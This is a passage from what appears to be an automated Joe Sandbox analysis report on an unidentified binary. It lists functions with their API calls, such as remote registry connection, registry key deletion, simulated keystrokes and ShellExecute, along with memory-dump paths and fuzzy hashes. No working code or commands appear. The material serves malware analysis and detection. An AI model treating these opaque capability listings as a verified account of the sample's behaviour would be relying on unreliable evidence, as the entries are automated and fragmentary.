Instruction Fuzzy Hash: 220112F6900208BFE711A794AD8DEE7776CD708305F4045B7BB46D2041EA789E848B79

Function 00472A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

Part of subcall function 00473AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00472AA6,?,?), ref: 00473B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00472AE7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 967eefd201a190c36af12e9edd6db115569389f7d773459f8122f3ad51b3aa93
Instruction ID: a7aeb55dd16f2bcf41f8d78a00b82c90fce2e77df2dae1f24715314fcc341779
Opcode Fuzzy Hash: 967eefd201a190c36af12e9edd6db115569389f7d773459f8122f3ad51b3aa93
Instruction Fuzzy Hash: 0F91A171604201AFCB01EF15C991BAEB7E4FF98318F04841EF99A97291DB78E945CF4A

Function 00469A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00469B38
WSAGetLastError.WS2_32(00000000), ref: 00469B45
__WSAFDIsSet.WS2_32(00000000,?), ref: 00469B6F
WSAGetLastError.WS2_32(00000000), ref: 00469B9F
htons.WS2_32(?), ref: 00469C51
inet_ntoa.WS2_32(?), ref: 00469C0C

Part of subcall function 0044E0F5: _strlen.LIBCMT ref: 0044E0FF
Part of subcall function 0044E0F5: _memmove.LIBCMT ref: 0044E121

_strlen.LIBCMT ref: 00469CA7
_memmove.LIBCMT ref: 00469D10

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3637404534-0
Opcode ID: 773f32e9bc66f6fe3d6d015103058dadb066be42f7337aa4e2fe2461e9681f4c
Instruction ID: 31be810891abe7707a84cb17f53c19889dafa4ebda364f29ae1d2fa3cf4e53d8
Opcode Fuzzy Hash: 773f32e9bc66f6fe3d6d015103058dadb066be42f7337aa4e2fe2461e9681f4c
Instruction Fuzzy Hash: 6D81C031504200ABD710EF65DC85EABB7E8EF88718F10462FF555972A1EB78ED04CB9A

Function 0043B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0043B744

Part of subcall function 00438A0C: __FF_MSGBANNER.LIBCMT ref: 00438A21
Part of subcall function 00438A0C: __NMSG_WRITE.LIBCMT ref: 00438A28
Part of subcall function 00438A0C: __malloc_crt.LIBCMT ref: 00438A48

__lock.LIBCMT ref: 0043B757
__lock.LIBCMT ref: 0043B7A3
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,004C6948,00000018,00446C2B,?,00000000,00000109), ref: 0043B7BF
RtlEnterCriticalSection.NTDLL(8000000C), ref: 0043B7DC
RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0043B7EC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: df44e678c3d4e4209e8163cf5ff0833024886568ecb8e628cb1ca07b6a58b793
Instruction ID: b84f3afc4cda644d7f87e877b47a1b0cf595143cd44e710813017c277b42ac2f
Opcode Fuzzy Hash: df44e678c3d4e4209e8163cf5ff0833024886568ecb8e628cb1ca07b6a58b793
Instruction Fuzzy Hash: 4A4126B1E002158BEB14EF69D84536DB7A4EF09339F10922FE625AB2D1C7789901CBDD

Function 0045A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0045A1CE

Part of subcall function 0043010A: std::exception::exception.LIBCMT ref: 0043013E
Part of subcall function 0043010A: __CxxThrowException@8.LIBCMT ref: 00430153

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0045A205
RtlEnterCriticalSection.NTDLL(?), ref: 0045A221
_memmove.LIBCMT ref: 0045A26F
_memmove.LIBCMT ref: 0045A28C
RtlLeaveCriticalSection.NTDLL(?), ref: 0045A29B
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0045A2B0
InterlockedExchange.KERNEL32(?,000001F6), ref: 0045A2CF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 38fe98020a02a4fdf647197fb5688b91b84dd7ac6043f438d2c4be934ae53c66
Instruction ID: 7828d58cb2ca639fe4e3f53a8c8a9c33a4beaea733f698896c8a51b66ae82dbd
Opcode Fuzzy Hash: 38fe98020a02a4fdf647197fb5688b91b84dd7ac6043f438d2c4be934ae53c66
Instruction Fuzzy Hash: DE318131E00105EBCF00DFA5DC86AAEB7B8EF49710F1481BAF904AB256D775D914CB69

Function 00478CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00478CF3
GetDC.USER32(00000000), ref: 00478CFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00478D06
ReleaseDC.USER32(00000000,00000000), ref: 00478D12
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00478D4E
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00478D5F
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00478D99
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00478DB9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 7e12a0d2e2ecfdc6919308efda1f42f44b19c68b3da5e5e9e117b58b709829ec
Instruction ID: 28437eff8dc8b1bd491af164d5559dc338bc92540749e61046e7e37aed922e71
Opcode Fuzzy Hash: 7e12a0d2e2ecfdc6919308efda1f42f44b19c68b3da5e5e9e117b58b709829ec
Instruction Fuzzy Hash: CC318D72541210BFEB208F51CC4AFEB3FA9EF59715F044066FE089A291DA759C41CB78

Function 00461BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

Part of subcall function 00413BCF: _wcscpy.LIBCMT ref: 00413BF2

_wcstok.LIBCMT ref: 00461D6E
_wcscpy.LIBCMT ref: 00461DFD
_memset.LIBCMT ref: 00461E30

Strings

t:Lp:L, xrefs: 00461E40
X, xrefs: 00461E68

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$t:Lp:L
API String ID: 774024439-2093062514
Opcode ID: 055efa304bff6ea483405d6f2933d0195e51c894fb58215a3bb9e3c480495e4c
Instruction ID: edd73faf298ffc51c845f70ae8065e19599833aa7ed34d97d335fb111d45a376
Opcode Fuzzy Hash: 055efa304bff6ea483405d6f2933d0195e51c894fb58215a3bb9e3c480495e4c
Instruction Fuzzy Hash: 5DC171755083009FC754EF25C881A9BB7E4BF85314F04492EF89A973A1EB78ED45CB8A

Function 0042B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0abde086d35451b4829e15484383a9524235ed0661c4b0b1d0aad06e596783
Instruction ID: e76ffe0f4f9660672383b642f62b80a102ebc845610e25406751dec0dc956fa3
Opcode Fuzzy Hash: 2f0abde086d35451b4829e15484383a9524235ed0661c4b0b1d0aad06e596783
Instruction Fuzzy Hash: E3718E70A00519FFCB04DF98DC88EAEBB74FF85318F14855AF915AB251C7389A41CBA8

Function 00472121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047214B
_memset.LIBCMT ref: 00472214
ShellExecuteExW.SHELL32(?), ref: 00472259

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

Part of subcall function 00413BCF: _wcscpy.LIBCMT ref: 00413BF2

CloseHandle.KERNEL32(00000000), ref: 00472320
FreeLibrary.KERNEL32(00000000), ref: 0047232F

Strings

@, xrefs: 00472225

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: b5639061312163bd17b6858bcccbf2082e258b0a670921413b67ec4c31aeebae
Instruction ID: 30c9ea506e1d1f94a70ef19c1d7cf03207c76931ac7e6b0846e3d68240ef19bf
Opcode Fuzzy Hash: b5639061312163bd17b6858bcccbf2082e258b0a670921413b67ec4c31aeebae
Instruction Fuzzy Hash: 51717D71A006199FCB14EFA5CA819DEB7F5FF48314F10805EE85AAB351DB78AD40CB98

Function 004547DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0045481D
GetKeyboardState.USER32(?), ref: 00454832
SetKeyboardState.USER32(?), ref: 00454893
PostMessageW.USER32(?,00000101,00000010,?), ref: 004548C1
PostMessageW.USER32(?,00000101,00000011,?), ref: 004548E0
PostMessageW.USER32(?,00000101,00000012,?), ref: 00454926
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00454949

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a0643b360f9170c8aad3c549c0cc96898d4735085723474dda7b43cbc5b68639
Instruction ID: b30e891961e7e1b9b1d652722f5b73b541a59eb2f1222b6369f9921152df2dfb
Opcode Fuzzy Hash: a0643b360f9170c8aad3c549c0cc96898d4735085723474dda7b43cbc5b68639
Instruction Fuzzy Hash: 8A51F5A05087C13DFB3652348C06BBB7E995B8630AF08858AE9D54A9C3C2DCECCCD754

Function 004545F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00454638
GetKeyboardState.USER32(?), ref: 0045464D
SetKeyboardState.USER32(?), ref: 004546AE
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004546DA
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004546F7
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0045473B
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0045475C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bb5089df033d45a923bbf5b5caf96b70ab33861fca611f5fb73c6bdf4fc2eb98
Instruction ID: 085bfac441d5fef114400efb517fe2f1fdd354324fd1b664427b61b57b4fc4a5
Opcode Fuzzy Hash: bb5089df033d45a923bbf5b5caf96b70ab33861fca611f5fb73c6bdf4fc2eb98
Instruction Fuzzy Hash: B651F3A05047D539FB3687248C05BBB7E995B8630AF08449AE9D44E9C3D39CECDCD758

Function 004586AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 004586BB
_wcsncpy.LIBCMT ref: 004586F0
_wcsncpy.LIBCMT ref: 00458722
_wcsncpy.LIBCMT ref: 00458755
_wcsncpy.LIBCMT ref: 00458797
_wcsncpy.LIBCMT ref: 004587D1
_wcsncpy.LIBCMT ref: 00458800

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 55d647ada9991b7ae79f2680368ac6f2ecda9893806264ca8b5777d12f9187e3
Instruction ID: 6d8b2caeae80493455e3276d014461728bcd70790409af794abdfc6b0dc98365
Opcode Fuzzy Hash: 55d647ada9991b7ae79f2680368ac6f2ecda9893806264ca8b5777d12f9187e3
Instruction Fuzzy Hash: F7417F75C1021475CB10BBB5CC86ACFB7ACEF09714F60946BE915F3122EA78E25487AD

Function 00479D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479DB0
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00479E57
IsMenu.USER32(?), ref: 00479E6F
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00479EB7
DrawMenuBar.USER32 ref: 00479ED0

Strings

0, xrefs: 00479DA9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: f81815811630f31ea5b97118201d6e2135971738b7f3f1812fab761f099442ab
Instruction ID: fe22becbccc21a78da1b3110dd3a0e392e475dd046e88df63c303e5257708894
Opcode Fuzzy Hash: f81815811630f31ea5b97118201d6e2135971738b7f3f1812fab761f099442ab
Instruction Fuzzy Hash: CE411675A00209EFDB20DF90D884ADABBB4FF09364F08802AE90997391D734ED50DB54

Function 00473C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00473C92
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00473CBC
FreeLibrary.KERNEL32(00000000), ref: 00473D71

Part of subcall function 00473C63: RegCloseKey.ADVAPI32(?), ref: 00473CD9
Part of subcall function 00473C63: FreeLibrary.KERNEL32(?), ref: 00473D2B
Part of subcall function 00473C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00473D4E

RegDeleteKeyW.ADVAPI32(?,?), ref: 00473D16

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 78b7bede9a0df9ee2426a977ecd4972f2373920482096e8164dfcaa1aa472004
Instruction ID: 3cb783ec15fc0ac2fd1357de5cbbee78ecd06f55c644f0e11796013dfe69e0c8
Opcode Fuzzy Hash: 78b7bede9a0df9ee2426a977ecd4972f2373920482096e8164dfcaa1aa472004
Instruction Fuzzy Hash: 093137B2900209BFDB259F94DC89AFFB7BCEB18305F00417AA516A2250E7749F499B64

Function 00478DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00478DF4
GetWindowLongW.USER32(00B79860,000000F0), ref: 00478E27
GetWindowLongW.USER32(00B79860,000000F0), ref: 00478E5C
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00478E8E
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00478EB8
GetWindowLongW.USER32(?,000000F0), ref: 00478EC9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00478EE3

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: c9ad2a4c527d253acef67705be00011e38bb2181ea7d13bc18978c7c8211dadb
Instruction ID: 50bd3ec59778421c33b8faf2d9c29ac96ce7a5d97302ecaf6b6fddb758f05652
Opcode Fuzzy Hash: c9ad2a4c527d253acef67705be00011e38bb2181ea7d13bc18978c7c8211dadb
Instruction Fuzzy Hash: 78313431680210AFDB20DF59DC88FA637A5FB5A354F14817AF909CB2B2CB75AC40DB49

Function 004516F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00451734
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045175A
SysAllocString.OLEAUT32(00000000), ref: 0045175D
SysAllocString.OLEAUT32(?), ref: 0045177B
SysFreeString.OLEAUT32(?), ref: 00451784
StringFromGUID2.COMBASE(?,?,00000028), ref: 004517A9
SysAllocString.OLEAUT32(?), ref: 004517B7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

